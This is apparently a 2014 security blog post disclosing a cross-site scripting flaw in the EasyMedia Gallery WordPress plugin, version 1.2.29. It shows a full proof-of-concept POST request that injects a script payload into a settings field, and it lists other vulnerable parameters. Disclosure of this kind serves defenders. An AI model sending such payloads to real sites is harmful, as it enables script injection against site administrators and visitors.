Tuesday 25 February 2014

[EN] Wordpress plugin EasyMedia Gallery vulnerable

# ==============================================================
# Title ...|EasyMedia Gallery XSS
# Version .| easy-media-gallery.1.2.29
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================


# ==============================================================
# EasyMedia Gallery XSS

---<request>---

POST /k/wordpress/wp-admin/edit.php?post_type=easymediagallery&page=emg_settings HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 1452

option_page=easy_options_group&action=update&_wpnonce=e4392a9119&_wp_http_referer=%2Fk%2Fwordpress%2Fwp-admin%2Fedit.php%3Fpost_type%3Deasymediagallery%26page%3Demg_settings&easymedia_columns=3&easymedia_alignstyle=Center&easymedia_img_size_limit='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&easymedia_vid_size%5Bwidth%5D=700&easymedia_vid_size%5Bheight%5D=400&easymedia_disen_autoplv=1&easymedia_disen_autopl=1&easymedia_disen_audio_loop=1&easymedia_audio_vol=100&easymedia_box_style=Light&easymedia_cur_style=Pointer&easymedia_mag_icon=Icon-0&easymedia_frm_size%5Bwidth%5D=160&easymedia_frm_size%5Bheight%5D=160&easymedia_frm_col=%23FFFFFF&easymedia_ttl_col=%23C7C7C7&easymedia_brdr_rds=3&easymedia_thumb_col=%23000000&easymedia_hover_opcty=40&easymedia_style_pattern=pattern-01.png&easymedia_disen_bor=1&easymedia_disen_hovstyle=1&save3=Save+Changes&easymedia_disen_plug=1&easymedia_disen_rclick=1&easymedia_disen_databk=1&easymedia_disen_admnotify=1&easymedia_disen_dasnews=1&easymedia_ajax_con_id=%23content&easymedia_plugin_core=core-1.4.5-min&easymedia_plugin_wpinfo=-+WP+Version+%3A+3.8.1%0D%0A-+EMG-Lite+Version+%3A+1.2.29%0D%0A-+Site+URL+%3A+http%3A%2F%2F10.149.14.62%2Fk%2Fwordpress%0D%0A-+WP+Multisite+%3A+NO%0D%0A-+PHP+Direct+Access+%3A+YES%0D%0A-+Memory+Limit+%3A+128+MB%0D%0A-+Active+Theme+%3A+Twenty+Fourteen%0D%0A-+Active+Plugins+%3A+%0D%0A+%C2%A0%C2%A0%C2%A0%C2%A0Easy+Media+Gallery%0D%0A+%C2%A0%C2%A0%C2%A0%C2%A0Zedity%0D%0A&action=save

---<request>---


Also vulnerable are: easymedia_vid_size%5Bwidth%5D, easymedia_vid_size%5Bheight%5D,
easymedia_frm_size%5Bwidth%5D, easymedia_ttl_col, easymedia_thumb_col,
easymedia_hover_opcty, easymedia_style_pattern, easymedia_ajax_con_id


# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

No comments:

Post a Comment

What do You think...?